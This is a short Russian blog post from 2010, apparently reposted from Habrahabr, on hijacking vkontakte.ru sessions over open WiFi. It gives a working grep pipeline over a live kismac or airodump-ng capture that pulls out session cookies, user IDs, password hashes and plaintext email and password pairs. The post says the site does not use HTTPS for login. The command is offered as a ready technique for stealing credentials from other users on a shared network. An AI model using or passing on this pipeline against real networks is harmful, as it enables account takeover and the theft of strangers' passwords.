понедельник, 20 декабря 2010 г.
Перехват cookie в реальном времени в открытых WiFi-сетях
На видео показан угон сессии вконтакте.ру, который почему-то до сих пор не использует авторизацию с https и передает пароли открытым текстом.
Дамп трафика собирается программой kismac в формате libpcap и параллельно парсится grep-ом с использованием регулярных выражений, что позволяет в реальном времени выводить на экран все интересующие куки и пароли. При этом не используется никаких анализаторов пакетов.
regexp для перехвата вконтакте.ру:
tail -F pcap.файл | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+»
Аналогичная конструкция будет работать и с дампом собранным с помощью airdump-ng.
Источник: Хабрахабр - Информационная безопасность
Оригинальная страница: Перехват cookie в реальном времени в открытых WiFi-сетях
Подписаться на:
Комментарии к сообщению (Atom)
Комментариев нет:
Отправить комментарий